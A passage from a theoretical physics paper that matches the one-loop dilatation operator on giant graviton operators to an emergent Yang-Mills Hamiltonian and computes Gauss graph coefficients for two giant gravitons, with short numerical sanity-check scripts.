We now show that the emergent Hamiltonian obtained in the last subsection matches the Hamiltonian of a Yang-Mills theory, which we call the emergent Yang-Mills theory. Which Yang-Mills theory should we expect? The operators we study have $p$ long columns, so by the holographic duality this system can be identified with a system of $p$ giant gravitons. This suggests that the emergent Hamiltonian describes the worldvolume dynamics of these giant gravitons. Since this worldvolume dynamics arises from the open string excitations stretching between the giant graviton branes, it should be a super Yang-Mills theory, and it should match the emergent Hamiltonian derived above.
To confirm our expectation, we will explicitly write down the Hamiltonian of this Yang-Mills theory for comparison. We expect a $U(p)$ gauge theory as the system consists of $p$ giant graviton branes. Each column in Young diagram $R$, or equivalently, each node in the Gauss graph corresponds to a brane. Therefore, the edges are naturally interpreted as open string excitations. The branes move in AdS$_5$ spacetime with metric
\begin{equation}
ds^2=R^2\left( -\cosh^2\rho dt^2 + d\rho^2+ \sinh^2\rho d\Omega_{3}^{2} \right)
\end{equation}
A brane corresponding to the $i$th column in $R$ has $\rho$ coordinate specified by
\begin{equation}
\cosh\rho =\sqrt{1+\frac{l_{R_i}}{N}} \qquad \sinh\rho=\sqrt{\frac{l_{R_i}}{N}}
\end{equation}
In the displaced corners limit the $l_{R_i}$ are not equal, hence the branes are separated, which implies that we are on the Coulomb branch of this gauge theory. In the low energy limit the dynamics is described by a $U(1)^p$ gauge theory. In addition, since the $\text{su}(3)$ sector is part of the $\text{su}(2|3)$ sector of the $\mathcal{N}=4$ super Yang-Mills theory, we do not expect to recover the complete $U(1)^p$ gauge theory. In fact, we should reproduce part of the $s$-wave bosonic sector of the emergent Yang-Mills theory \cite{2020EmergentYangMills}.
The above discussion motivates us to study a $U(p)$ gauge theory of adjoint scalars living on an $S^3$. The action reads
\begin{equation}
\begin{gathered}
S=\frac{1}{g_{Y M}^{2}} \int_{\mathbb{R} \times S^{3}}\left[\operatorname{Tr}\left(\partial_{\mu} X \partial^{\mu} X^{\dagger}+\partial_{\mu} Y \partial^{\mu} Y^{\dagger}-\frac{1}{R^{2}}\left(X X^{\dagger}+Y Y^{\dagger}\right)-[X, Y][Y^{\dagger}, X^{\dagger}]\right)\right. \\
\left.-\sum_{i \neq j} m_{i j}^{2}\left(X_{i j} X_{j i}^{\dagger}+Y_{i j} Y_{j i}^{\dagger}\right)\right] d t R^{3} d \Omega_{3}
\end{gathered}
\end{equation}
where $m_{ij}$ are the masses of the off-diagonal matrix elements of $X,Y$, proportional to the distances separating the branes. The $s$-wave sector is given by
\begin{equation}
\begin{aligned}
S=\frac{R^{3} \Omega_{3}}{g_{Y M}^{2}} \int_{\mathbb{R}} &\left[\operatorname{Tr}\left(\dot{X} \dot{X}^{\dagger}+\dot{Y} \dot{Y}^{\dagger}-\frac{1}{R^{2}}\left(X X^{\dagger}+Y Y^{\dagger}\right)-[X, Y][Y^{\dagger}, X^{\dagger}]\right)\right.\\
&\left.-\sum_{i \neq j} m_{i j}^{2}\left(X_{i j} X_{j i}^{\dagger}+Y_{i j} Y_{j i}^{\dagger}\right) d t\right]
\end{aligned}
\end{equation}
The action of the one-loop dilatation operator should correspond to the interaction Hamiltonian given by
\begin{equation}
H_{\text{int}}=\frac{R^{3} \Omega_{3}}{g_{Y M}^{2}}\left[ \sum_{i\neq j}^{p}m_{ij}^{2}\left(X_{i j} X_{j i}^{\dagger}+Y_{i j} Y_{j i}^{\dagger}\right)+\text{Tr}\left([X, Y][Y^{\dagger}, X^{\dagger}]\right) \right]
\end{equation}
Since our operators in the original theory are constructed using $\phi_A$ but not $\phi_A^{\dagger}$, a proper truncation must be made in the emergent theory. This truncation is achieved by setting $X=\bar{a},X^{\dagger}=a,Y=\bar{b}$ and $Y^{\dagger}=b$. The truncated normal ordered interaction Hamiltonian is then given by
\begin{equation}
H_{\text{int}}=\frac{R^{3} \Omega_{3}}{g_{Y M}^{2}}\left[ \sum_{i\neq j}^{p}m_{ij}^{2}\left(\bar{a}_{i j} a_{j i}+\bar{b}_{i j} b_{j i}\right)+\text{Tr}\left([\bar{b}, \bar{a}][a, b]\right) \right]
\end{equation}
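Since $[Y^{\dagger},X^{\dagger}]=[X,Y]^{\dagger}$, the quartic term in $H_{\text{int}}$ is $\text{Tr}(MM^{\dagger})$ with $M=[X,Y]$, and hence non-negative, as a potential should be. A quick numerical check with random matrices (our own sanity check, with an arbitrary illustrative rank $p$):

```python
import numpy as np

rng = np.random.default_rng(0)
p = 4                            # illustrative rank
X = rng.standard_normal((p, p)) + 1j * rng.standard_normal((p, p))
Y = rng.standard_normal((p, p)) + 1j * rng.standard_normal((p, p))

M = X @ Y - Y @ X                                              # [X, Y]
comm_dag = Y.conj().T @ X.conj().T - X.conj().T @ Y.conj().T   # [Y^dag, X^dag]

# [Y^dag, X^dag] is the Hermitian conjugate of [X, Y] ...
assert np.allclose(comm_dag, M.conj().T)

# ... so the quartic term is Tr(M M^dag) = ||[X, Y]||^2 >= 0.
V = np.trace(M @ comm_dag)
print(V.real)                    # non-negative; V.imag is numerically zero
```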
By identifying $\bar{b},b$ with $\bar{b}_3,b_3$ and $\bar{a},a$ with $\bar{b}_2,b_2$, we arrive at the following identification
\begin{equation}
\renewcommand{\arraystretch}{1.5}
\begin{array}{lll}
m_{ij}^{2}\bar{a}_{i j} a_{j i} &\leftrightarrow & H_{31}\\
m_{ij}^{2}\bar{b}_{i j} b_{j i}&\leftrightarrow& H_{21}\\
\text{Tr}\left([\bar{b}, \bar{a}][a, b]\right) &\leftrightarrow& H_{32}
\end{array}
\end{equation}
A detailed discussion is given in \cite{2020EmergentYangMills}. We have now confirmed that, at leading order, the action of the dilatation operator precisely describes the dynamics of giant graviton branes.
\section{The Subleading Corrections}\label{analyticsubleading}
In this section, we focus on a system of two giant gravitons, in which the Young diagram labeling the operator has two long columns. We also assume that $n_2=n_3=2$, i.e. our operators are constructed using many $\phi_1$ fields, two $\phi_2$ fields and two $\phi_3$ fields. This restriction significantly simplifies our formulas, making an analytic calculation of the matrix elements of the dilatation operator possible. We perform this calculation in this section, obtaining an explicit expression for the action of the dilatation operator in the Gauss graph basis, valid to all orders in $1/N$. This exact result is then expanded to obtain the subleading correction to the leading action. The leading action has already been matched to Yang-Mills theory at linear level; the subleading corrections correspond to interactions. Finally, we find that the spectrum of the leading contribution to $D_{32}$ has evenly spaced energy levels, with a spacing that is of order 1 at large $N$, while the subleading corrections produce small shifts of these levels.
\subsection{The System of Two Giant Gravitons}
We study a set of operators labeled by Young diagram $R$ with only two columns. The operators are constructed using many $\phi_1$ fields, two $\phi_2$ fields and two $\phi_3$ fields, i.e. we set $p=2$ and $n_3=n_2=2$ and take $n_1$ to be of order $N$. These choices imply some significant simplifications:
\begin{itemize}
\item[1.] Although the dilatation operator acting on operators labeled by Young diagrams with two columns produces operators with three columns, the contribution of these three column operators will be neglected---the extra column of these operators is much shorter than the two long columns, so they correspond to bound states of two threebranes with some Kaluza-Klein (KK) gravitons. Graviton emission occurs when a two threebrane state transforms into a state of two threebranes with KK gravitons, and in the 't Hooft limit the amplitude of this transition is proportional to the string coupling $g_s \propto \frac{1}{N}$. Thus, the mixing with operators having more than two columns is suppressed and can be dropped. This simplification allows us to study the action of the dilatation operator in a basis consisting of a finite number of operators, each with two long columns. Precisely, the restricted Schur polynomial basis consists of the 16 operators shown below
\begin{equation}\label{restricted Schur's basis of two giant gravitons}
\begin{aligned}
&O_{aa}(\xi_0,\xi_1);\quad O_{da}(\xi_0,\xi_1);\quad O_{ea}(\xi_0,\xi_1);\quad O_{ba}(\xi_0,\xi_1)\\
&O_{ad}(\xi_0,\xi_1);\quad O_{ae}(\xi_0,\xi_1);\quad O_{dd}(\xi_0,\xi_1);\quad O_{de}(\xi_0,\xi_1)\\
&O_{ed}(\xi_0,\xi_1);\quad O_{ee}(\xi_0,\xi_1);\quad O_{bd}(\xi_0,\xi_1);\quad O_{be}(\xi_0,\xi_1)\\
&O_{ab}(\xi_0,\xi_1);\quad O_{db}(\xi_0,\xi_1);\quad O_{eb}(\xi_0,\xi_1);\quad O_{bb}(\xi_0,\xi_1)\\
\end{aligned}
\end{equation}
Our notation is as follows: we use $(\xi_0,\xi_1)$ to specify the Young diagram $r_1$, which has $\xi_0$ rows with two boxes and $\xi_1$ rows with one box. The labels $a,b,d,e$ specify the irreducible representation $r_A$ together with $\vec{n}_A$, the vector whose elements count the boxes removed from each column of the Young diagram $R$ to be assembled into $r_A$, as follows
\begin{equation}
\begin{aligned}
&a \rightarrow {\tiny \young({\,}{\,},{\,}{\,},{\,}{\,},{\,}{\,},{\,},{*},{*})}; {\tiny \yng(2,2,2,2,1)},{\tiny \yng(1,1)}\\
&b \rightarrow {\tiny \young({\,}{\,},{\,}{\,},{\,}{*},{\,}{*},{\,},{\,},{\,})}; {\tiny \yng(2,2,1,1,1,1,1)},{\tiny \yng(1,1)}\\
&d \rightarrow {\tiny \young({\,}{\,},{\,}{\,},{\,}{\,},{\,}{*},{\,},{\,},{*})}; {\tiny \yng(2,2,2,1,1,1)},{\tiny \yng(2)}\\
&e \rightarrow {\tiny \young({\,}{\,},{\,}{\,},{\,}{\,},{\,}{*},{\,},{\,},{*})}; {\tiny \yng(2,2,2,1,1,1)},{\tiny \yng(1,1)}\\
\end{aligned}
\end{equation}
where on the RHS the first Young diagram denotes $R$ while the last Young diagram denotes $r_A$. We label the boxes to be removed by $*$. For example, by removing one box from each column of $R$ and assembling them into ${\tiny \yng(2)}$ we obtain $d$, so that we have $\vec{n}_A=(1,1)$. Both $r_2$ and $r_3$ can be any one of $a,b,d,e$, so that we have $4\times4=16$ operators; the first subscript specifies $r_2$ and the second subscript specifies $r_3$. For instance, $O_{ae}(\xi_0,\xi_1)$ denotes the operator labeled by $r_1=(\xi_0,\xi_1),r_2=a,r_3=e$ with $\vec{n}_2=(2,0),\vec{n}_3=(1,1)$---we first remove one box from each column of $R$ and reassemble them into ${\tiny \yng(1,1)}$ to obtain $r_3=e$, and then remove two boxes from the first column of $R$ to obtain $r_2=a$. Note that when deciding how removed boxes can be assembled to give an irreducible representation, we must respect edges that are joined. The remaining part of $R$ is nothing but $r_1=(\xi_0,\xi_1)$.
\item[2.] It can be proved that when the Young diagram $R$ has only two columns, no multiplicity label $\vec{\mu}$ is needed, i.e. each $\vec{r}=(r_1,r_2,r_3)$, an irreducible representation of $S_{n_1}\times S_{n_2}\times S_{n_3}$ as a subgroup of $S_{n_T}$, appears only once as a subspace of $R$ \cite{2011Surprisingly}. This fact reduces the intertwiner $P_{R,(\vec{r}) \vec{\mu} \vec{\nu}}$ to the projector $P_{R\rightarrow(\vec{r})}$ from $R$ onto its subspace $\vec{r}$. It allows us to explicitly write down $P_{R\rightarrow(\vec{r})}$ using the basis of $\vec{r}$ represented by Young-Yamanouchi symbols.
As an example, we will explain how to obtain $P_{R\rightarrow(\xi_0,\xi_1)da}$, where the subspace it projects onto is specified by $r_1=(\xi_0,\xi_1),r_2=d,r_3=a$. This subspace should be spanned by
\begin{equation}
\ket{1,i}=\ket{{\tiny \young({\,}{\,},{\,}{\,},{\,}{\,},{\,}{4},{\,},{3},{2},{1})}\,i};\quad \ket{2,i}=\ket{{\tiny \young({\,}{\,},{\,}{\,},{\,}{\,},{\,}{3},{\,},{4},{2},{1})}\,i}
\end{equation}
where we assume $S_{n_3}$ acts on the numbers $1,2$ while $S_{n_2}$ acts on $3,4$. We use the label $i$ to denote the $d_{r_1}$ different ways to fill the remaining boxes. Thus, the above basis spans a $2d_{r_1}$-dimensional space given by $(\xi_0,\xi_1)da\oplus (\xi_0,\xi_1)ea$. The irreducible representation $(\xi_0,\xi_1)da$ is furnished by the vectors
\begin{equation}
\begin{aligned}
&\ket{{\tiny \young({\,}{\,},{\,}{\,},{\,}{\,},{\,},{\,})}\,i,{\tiny \young({4}{3})},{\tiny \young({2},{1})}}=A\ket{1,i}+B\ket{2,i}\\
\end{aligned}
\end{equation}
Acting with $\Gamma^{R}((34))$ on the above vector and using the well-known action of $\Gamma^{R}(\sigma)$ on Young-Yamanouchi vectors, we obtain the equations
\begin{equation}
\begin{aligned}
&A=-\frac{1}{(\xi_1+2)}A+\sqrt{1-\frac{1}{(\xi_1+2)^2}}B\\
&B=\sqrt{1-\frac{1}{(\xi_1+2)^2}}A+\frac{1}{(\xi_1+2)}B
\end{aligned}
\end{equation}
With the normalization $A^2+B^2=1$, we obtain a solution
\begin{equation}
A=\sqrt{\frac{\xi_1+1}{2(\xi_1+2)}}; \quad B=\sqrt{\frac{\xi_1+3}{2(\xi_1+2)}};
\end{equation}
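This solution can be verified symbolically: $(A,B)$ is the unit-norm eigenvector, with eigenvalue $+1$, of the $2\times2$ block of $\Gamma^{R}((34))$ read off from the equations above. A short sympy check (our own, not part of the derivation):

```python
import sympy as sp

xi1 = sp.symbols('xi1', positive=True)
c = 1 / (xi1 + 2)
s = sp.sqrt(1 - c**2)

# Gamma^R((34)) restricted to the span of {|1,i>, |2,i>}, read off
# from the pair of equations above:
G = sp.Matrix([[-c, s], [s, c]])

A = sp.sqrt((xi1 + 1) / (2 * (xi1 + 2)))
B = sp.sqrt((xi1 + 3) / (2 * (xi1 + 2)))
v = sp.Matrix([A, B])

print(sp.simplify(A**2 + B**2))                          # 1 (unit norm)
print((G * v - v).subs(xi1, 3).applyfunc(sp.simplify))   # zero vector
```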
Finally, we can write the projector $P_{R\rightarrow(\xi_0,\xi_1)da}$ as
\begin{equation}
\begin{aligned}
P_{R\rightarrow(\xi_0,\xi_1)da}&=\sum_{i} \ket{{\tiny \young({\,}{\,},{\,}{\,},{\,}{\,},{\,},{\,})}\,i,{\tiny \young({4}{3})},{\tiny \young({2},{1})}}\bra{{\tiny \young({\,}{\,},{\,}{\,},{\,}{\,},{\,},{\,})}\,i,{\tiny \young({4}{3})},{\tiny \young({2},{1})}}\\
&=\sum_i \left(\frac{\xi_1+1}{2(\xi_1+2)}\ket{1,i}\bra{1,i} + \frac{\sqrt{(\xi_1+1)(\xi_1+3)}}{2(\xi_1+2)}\ket{1,i}\bra{2,i} \right. \\
&\left. + \frac{\sqrt{(\xi_1+1)(\xi_1+3)}}{2(\xi_1+2)}\ket{2,i}\bra{1,i} + \frac{\xi_1+3}{2(\xi_1+2)}\ket{2,i}\bra{2,i} \right)
\end{aligned}
\end{equation}
\item[3.] Labeling the Young diagram $r_1$ by a pair of parameters $(\xi_0,\xi_1)$ makes it straightforward to consider the large $N$ limit and the displaced corners limit. We assume $\xi_0\sim N$ and $\xi_0\gg\xi_1$ when we refer to the large $N$ limit, hence we are allowed to set $\xi_0+\xi_1+a=\xi_0$ where $a$ is any number of order 1. When we refer to the displaced corners limit, we assume $\xi_1\sim \sqrt{N}$, which allows us to set $\xi_1+a=\xi_1$ and to drop terms of order $\frac{1}{\xi_1}$ or higher. Our computation thus has two small numbers, $\frac{1}{\xi_0}$ and $\frac{1}{\xi_1}$. We can expand in these two numbers, dropping higher order terms, which provides a dramatic simplification.
\end{itemize}
Thanks to these simplifications, it is possible to perform an analytic calculation of the exact action of the dilatation operator. We explain this calculation next.
\subsection{The Analytic Calculation}
Our goal is to obtain the action of the dilatation operator in the Gauss graph basis, using the displaced corners limit, which is expected to describe the worldvolume dynamics of giant gravitons. Based on the discussion in the sections above, our calculation can be summarized as follows
\begin{itemize}
\item[1] Calculate the action of the dilatation operator in the restricted Schur polynomial basis according to equation (\ref{action on restricted Schur's}). The bulk of the work in this step is computing the trace $\text{Tr}_{R}(\cdots)$ by expressing the operators being traced in terms of Young-Yamanouchi vectors, which give a basis for $R$. At the end of this step we obtain $16\times16$ matrices describing the action of $D_{31},D_{21},D_{32}$ in the restricted Schur polynomial basis.
\item[2] Perform the transformation shown in equation (\ref{transform to Gauss graph basis}) on the matrices obtained in the last step. This entails computing the group theoretic coefficients given in equation (\ref{group theoretical coefficients for long columns}). This gives three $16\times16$ matrices, describing the action of $D_{31},D_{21},D_{32}$ in the Gauss graph basis. These matrices have entries dependent on $\xi_0,\xi_1$.
\item[3] Finally, we expand the answer as a power series in the two small parameters $1/\xi_0$ and $1/\xi_1$. To take the large $N$ limit, we first expand the results in $1/\xi_0$ and retain the leading terms. In practice, terms of order $(1/\xi_0)^0$ are retained in $D_{31}$ and $D_{21}$, while those of order $1/\xi_0$ are retained in $D_{32}$. We then expand in $1/\xi_1$. Eventually, the leading contribution to $D_{31}$ and $D_{21}$ comes from terms of order $1/(\xi_0\xi_1)^0$, and the leading contribution to $D_{32}$ is given by terms of order $1/(\xi_0\xi_1^{\,0})$. The subleading correction to $D_{32}$ is therefore given by terms of order $1/(\xi_0\xi_1)$. The leading order must agree with the analytic results shown in equations (\ref{D31,D21 in Gauss graph basis}) and $(\ref{M32 in Gauss graph basis})$, which provides a highly non-trivial check of our calculation. The subleading terms correspond to interactions. These are new results, obtained for the first time in this paper, and they allow us to study the non-linear interactions present in the emergent Yang-Mills theory.
\end{itemize}
It is worth describing some of the details of the calculation. Firstly, we explain how to compute the trace $\text{Tr}_{R}(\cdots)$ in equation (\ref{action on restricted Schur's}). This is principally done by writing everything in terms of Young-Yamanouchi vectors. Since the action of $\Gamma^{R}(\sigma)$ in the Young-Yamanouchi basis is well known and we know how to write down the projectors introduced above, we need only discuss the intertwiners $I_{R'T'}$. This map is non-vanishing only when $R$ is related to $T$: either $(i)$ by moving one box from the second column of $T$ to the first column, $(ii)$ by moving one box from the first column of $T$ to the second column, or $(iii)$ if $R=T$. The $I_{R'T'}$ for case $(i)$ can be written as
\begin{equation}
I_{R'T'}=\ket{{\tiny \young({\,}{\,},{\,}{\,},{\,}{\,},{\,}{\,},{\,},{\,},{\,},{1})}}\bra{{\tiny \young({\,}{\,},{\,}{\,},{\,}{\,},{\,}{\,},{\,}{1},{\,},{\,})}}
\end{equation}
while $I_{T'R'}$ is manifestly obtained by swapping the bra and ket vectors
\begin{equation}
I_{T'R'}=\ket{{\tiny \young({\,}{\,},{\,}{\,},{\,}{\,},{\,}{\,},{\,}{1},{\,},{\,})}}\bra{{\tiny \young({\,}{\,},{\,}{\,},{\,}{\,},{\,}{\,},{\,},{\,},{\,},{1})}}
\end{equation}
The intertwiners for cases $(ii)$ and $(iii)$ are written in a similar way.
Next, we will derive the group theoretical coefficients used to transform to the Gauss graph basis. The main task is to compute the branching coefficient, which is given by
\begin{equation}
B_{k\mu_A}^{r_A\rightarrow 1^{\vec{n}_A}}=\braket{r_A;k|r\rightarrow 1^{\vec{n}_A};\mu_A}
\end{equation}
where $\ket{r_A;k}$ denotes the $k$th basis vector of $r_A$ and $\ket{r\rightarrow 1^{\vec{n}_A};\mu_A}$ denotes the basis vector of the anti-trivial representation $1^{\vec{n}_A}$, a 1-dimensional subspace of $r_A$. In our two giant graviton system, no multiplicity label is needed and all possible $r_A$, given by the $a,b,d,e$ introduced above, are one-dimensional. Thus we can drop all subscripts on $B_{k\mu_A}^{r_A\rightarrow 1^{\vec{n}_A}}$ and write it as a number $B^{r_A\rightarrow 1^{\vec{n}_A}}$. It is evident that
\begin{equation}
B^{a\rightarrow 1^{(2,0)}}=B^{b\rightarrow 1^{(0,2)}}=1
\end{equation}
because the anti-trivial representation $1^{(2,0)}$ (or $1^{(0,2)}$) of $S_2$ in $a$ (or $b$) is just itself. In addition, we have
\begin{equation}
B^{d\rightarrow 1^{(1,1)}}=B^{e\rightarrow 1^{(1,1)}}=\pm 1
\end{equation}
because $\ket{d\rightarrow 1^{(1,1)}}=\pm\ket{d}$ (or $\ket{e\rightarrow 1^{(1,1)}}=\pm\ket{e}$) can furnish the anti-trivial representation $1^{(1,1)}$ of $S_{1}\times S_{1}$ in $d$ (or $e$). This arbitrariness will not cause any problem as the branching coefficient always appears twice in the group theoretical coefficient. The above four branching coefficients are all we need. Now, the relevant group theoretical coefficients are given by
\begin{equation}
\begin{aligned}
&C^{a}(1)=|S_2| \sqrt{\frac{d_{a}}{2!}}\text{sgn}(1)\Gamma^{a}(1)B^{a\rightarrow 1^{(2,0)}} B^{a\rightarrow 1^{(2,0)}}\\
&C^{b}(1)=|S_2| \sqrt{\frac{d_{b}}{2!}}\text{sgn}(1)\Gamma^{b}(1)B^{b\rightarrow 1^{(0,2)}} B^{b\rightarrow 1^{(0,2)}}\\
&C^{d}(1)=|S_1\times S_1| \sqrt{\frac{d_{d}}{2!}}\text{sgn}(1)\Gamma^{d}(1)B^{d\rightarrow 1^{(1,1)}} B^{d\rightarrow 1^{(1,1)}}\\
&C^{d}((12))=|S_1\times S_1| \sqrt{\frac{d_{d}}{2!}}\text{sgn}((12))\Gamma^{d}((12))B^{d\rightarrow 1^{(1,1)}} B^{d\rightarrow 1^{(1,1)}}\\
&C^{e}(1)=|S_1\times S_1| \sqrt{\frac{d_{e}}{2!}}\text{sgn}(1)\Gamma^{e}(1)B^{e\rightarrow 1^{(1,1)}} B^{e\rightarrow 1^{(1,1)}}\\
&C^{e}((12))=|S_1\times S_1| \sqrt{\frac{d_{e}}{2!}}\text{sgn}((12))\Gamma^{e}((12))B^{e\rightarrow 1^{(1,1)}} B^{e\rightarrow 1^{(1,1)}}\\
\end{aligned}
\end{equation}
where the elements of $S_2$ are denoted by $1$ (the identity) as well as $(12)$, and we use the fact that $\Gamma^{r^T}(\sigma)=\text{sgn}(\sigma)\Gamma^{r}(\sigma)$ for the symmetric group. The final results are
\begin{equation}
\begin{aligned}
&C^{a}(1)=\sqrt{2}; \quad C^{b}(1)=\sqrt{2}; \\
&C^{d}(1)=\frac{1}{\sqrt{2}}; \quad C^{d}((12))=-\frac{1}{\sqrt{2}}\\
&C^{e}(1)=\frac{1}{\sqrt{2}}; \quad C^{e}((12))=\frac{1}{\sqrt{2}}
\end{aligned}
\end{equation}
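These six values follow mechanically from the formula above, using $d_{r_A}=1$, the group orders $|S_2|=2$ and $|S_1\times S_1|=1$, and the signs of the one-dimensional $S_2$ irreps. A short script reproducing the table (our own bookkeeping sketch; the dictionary entries encode which label carries the symmetric versus antisymmetric representation):

```python
import math

sgn = {'1': 1, '(12)': -1}              # sign of the S_2 element
# Gamma^{r_A}(sigma): a, b, e carry the antisymmetric irrep of S_2
# (a single column of two boxes), d carries the symmetric one.
gamma = {'a': sgn, 'b': sgn, 'd': {'1': 1, '(12)': 1}, 'e': sgn}
order_H = {'a': 2, 'b': 2, 'd': 1, 'e': 1}   # |S_2| or |S_1 x S_1|
d_r = 1                                 # every irrep here is 1-dimensional
B_sq = 1                                # branching coefficient squared

def C(r, sigma):
    # sgn(sigma) * Gamma^r(sigma) implements Gamma^{r^T}(sigma)
    return (order_H[r] * math.sqrt(d_r / math.factorial(2))
            * sgn[sigma] * gamma[r][sigma] * B_sq)

for r, sigma in [('a', '1'), ('b', '1'), ('d', '1'),
                 ('d', '(12)'), ('e', '1'), ('e', '(12)')]:
    print(f"C^{r}({sigma}) = {C(r, sigma):+.4f}")
```

The same script gives $C^{a}((12))=C^{a}(1)=\sqrt{2}$, consistent with the remark below on why $C^{a}((12))$ and $C^{b}((12))$ are not independently needed.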
Notice that $C^{a}((12))$ and $C^{b}((12))$ are not needed. To understand why, recall that the LHS of the basis transformation shown in equation (\ref{basis transformation}) requires only Gauss graph operators with non-equivalent $\sigma_A$. With $r_A=a$, we have $H_{\vec{n}_A}=S_2$, so that all elements of $S_2$ are in the same equivalence class of the double coset $S_2\backslash S_2/ S_2$. Thus for $r_A=a$, we only need operators with $\sigma_A=1$. In fact, a simple calculation shows that $C^{a}(1)=C^{a}((12))$, as we expect. The same argument shows that $C^{b}((12))$ is not needed. However, for $r_A=d$ or $e$, we have $H_{\vec{n}_A}=S_1\times S_1$. In this case, $1$ and $(12)$ are in different classes of the double coset $(S_1\times S_1)\backslash S_2 / (S_1\times S_1)$, so they are not equivalent. Hence, we need operators with $\sigma_A=1$ as well as with $\sigma_A=(12)$.
Finally, since we will use Gauss graph operators to diagonalize the dilatation operator, we implicitly assume that $D_{31}$ and $D_{21}$ commute with $D_{32}$. We verify this using our exact result: the matrix elements of the commutators $[D_{31},D_{32}]$ and $[D_{21},D_{32}]$ are of order $1/(\xi_0\xi_1^2)$ or higher in the expansion introduced above, so they vanish at the order we consider.
These details give everything that is needed to carry out the calculation. We give the results in the next subsection.
\subsection{Results at Leading Order}
To express the result for the action of the dilatation operator in the Gauss graph basis, it is worth introducing a concise notation to specify the relevant Gauss graph operators. We use $\alpha,\beta,\gamma$ to specify $\vec{n}_A$ where
\begin{equation}
\alpha=(2,0); \quad \beta=(0,2); \quad \gamma=(1,1)
\end{equation}
For example, $O_{(\xi_0,\xi_1)\gamma\alpha}((12),1)$ specifies the Gauss graph operator with $\vec{n}_2=\gamma,\vec{n}_3=\alpha,\sigma_{2}=(12),\sigma_{3}=1$ and $r_1=(\xi_0,\xi_1)$. With the help of equation (\ref{basis transformation}), we see that this Gauss graph operator is given by
\begin{equation}
\begin{aligned}
O_{(\xi_0,\xi_1)\gamma\alpha}((12),1)&=C^{d}((12))C^{a}(1)O_{da}(\xi_0,\xi_1)+C^{e}((12))C^{a}(1)O_{ea}(\xi_0,\xi_1)\\
&=-O_{da}(\xi_0,\xi_1)+O_{ea}(\xi_0,\xi_1)
\end{aligned}
\end{equation}
It is evident that we have 16 Gauss graph operators. In the notation we have just introduced, they can be written as
\begin{equation}
\begin{array}{llll}
O_{(\xi_0,\xi_1)\alpha\alpha}(1,1); & O_{(\xi_0,\xi_1)\gamma\alpha}(1,1); & O_{(\xi_0,\xi_1)\gamma\alpha}((12),1); & O_{(\xi_0,\xi_1)\beta\alpha}(1,1);\\
O_{(\xi_0,\xi_1)\alpha\gamma}(1,1); & O_{(\xi_0,\xi_1)\alpha\gamma}(1,(12)); & O_{(\xi_0,\xi_1)\gamma\gamma}(1,1); & O_{(\xi_0,\xi_1)\gamma\gamma}(1,(12));\\
O_{(\xi_0,\xi_1)\gamma\gamma}((12),1); & O_{(\xi_0,\xi_1)\gamma\gamma}((12),(12)); & O_{(\xi_0,\xi_1)\beta\gamma}(1,1); & O_{(\xi_0,\xi_1)\beta\gamma}(1,(12));\\
O_{(\xi_0,\xi_1)\alpha\beta}(1,1); & O_{(\xi_0,\xi_1)\gamma\beta}(1,1); & O_{(\xi_0,\xi_1)\gamma\beta}((12),1); & O_{(\xi_0,\xi_1)\beta\beta}(1,1);\\
\end{array}
\end{equation}
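The count of 16 is just the count of double coset representatives: $\vec{n}_A\in\{\alpha,\beta\}$ contributes a single representative while $\vec{n}_A=\gamma$ contributes two, giving $(1+1+2)^2=16$. A tiny enumeration (our own sketch):

```python
from itertools import product

# Double coset representatives sigma_A of H\S_2/H for each n_A:
# H = S_2 for alpha = (2,0) and beta = (0,2), where all of S_2 collapses
# to the identity; H = S_1 x S_1 for gamma = (1,1), where 1 and (12)
# are inequivalent.
reps = {'alpha': ['1'], 'beta': ['1'], 'gamma': ['1', '(12)']}

labels = [(n2, s2, n3, s3)
          for n2, n3 in product(reps, reps)
          for s2 in reps[n2]
          for s3 in reps[n3]]
print(len(labels))   # 16
```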
Each of these operators is specified by a Gauss graph. We will soon spell this correspondence out in detail. In terms of this notation, the action of the dilatation operator in the Gauss graph basis, calculated analytically, is shown below. We have taken the large $N$ limit and the displaced corners limit, hence we show the leading order result. Only the non-vanishing matrix elements are shown. For example, our analytic result implies that $D_{31}O_{(\xi_0,\xi_1)\gamma\alpha}(1,1)=0$, so we do not write it down. Also, to simplify our expressions we use the shorthand $C_0=N-\xi_0$ and $C_1=N-\xi_0-\xi_1$.
The result of the action of $D_{31}$ in the Gauss graph basis reads
\begin{equation}
\begin{aligned}
&D_{31} O_{(\xi_0,\xi_1)\alpha\gamma}(1,(12))=2\left[ -(C_0+C_1)O_{(\xi_0,\xi_1)\alpha\gamma}(1,(12)) \right.\\
&\left.+\sqrt{C_0C_1}O_{(\xi_0+1,\xi_1-2)\alpha\gamma}(1,(12))+\sqrt{C_0C_1}O_{(\xi_0-1,\xi_1+2)\alpha\gamma}(1,(12))\right]
\end{aligned}
\end{equation}
\begin{equation}
\begin{aligned}
&D_{31} O_{(\xi_0,\xi_1)\gamma\gamma}(1,(12))=2\left[ -(C_0+C_1)O_{(\xi_0,\xi_1)\gamma\gamma}(1,(12)) \right.\\
&\left.+\sqrt{C_0C_1}O_{(\xi_0+1,\xi_1-2)\gamma\gamma}(1,(12))+\sqrt{C_0C_1}O_{(\xi_0-1,\xi_1+2)\gamma\gamma}(1,(12))\right]
\end{aligned}
\end{equation}
\begin{equation}
\begin{aligned}
&D_{31} O_{(\xi_0,\xi_1)\gamma\gamma}((12),(12))=2\left[ -(C_0+C_1)O_{(\xi_0,\xi_1)\gamma\gamma}((12),(12)) \right.\\
&\left.+\sqrt{C_0C_1}O_{(\xi_0+1,\xi_1-2)\gamma\gamma}((12),(12))+\sqrt{C_0C_1}O_{(\xi_0-1,\xi_1+2)\gamma\gamma}((12),(12))\right]
\end{aligned}
\end{equation}
\begin{equation}
\begin{aligned}
&D_{31} O_{(\xi_0,\xi_1)\beta\gamma}(1,(12))=2\left[ -(C_0+C_1)O_{(\xi_0,\xi_1)\beta\gamma}(1,(12)) \right.\\
&\left.+\sqrt{C_0C_1}O_{(\xi_0+1,\xi_1-2)\beta\gamma}(1,(12))+\sqrt{C_0C_1}O_{(\xi_0-1,\xi_1+2)\beta\gamma}(1,(12))\right]
\end{aligned}
\end{equation}
The result of the action of $D_{21}$ in the Gauss graph basis reads
\begin{equation}
\begin{aligned}
&D_{21} O_{(\xi_0,\xi_1)\gamma\alpha}((12),1)=2\left[ -(C_0+C_1)O_{(\xi_0,\xi_1)\gamma\alpha}((12),1) \right.\\
&\left.+\sqrt{C_0C_1}O_{(\xi_0+1,\xi_1-2)\gamma\alpha}((12),1)+\sqrt{C_0C_1}O_{(\xi_0-1,\xi_1+2)\gamma\alpha}((12),1)\right]
\end{aligned}
\end{equation}
\begin{equation}
\begin{aligned}
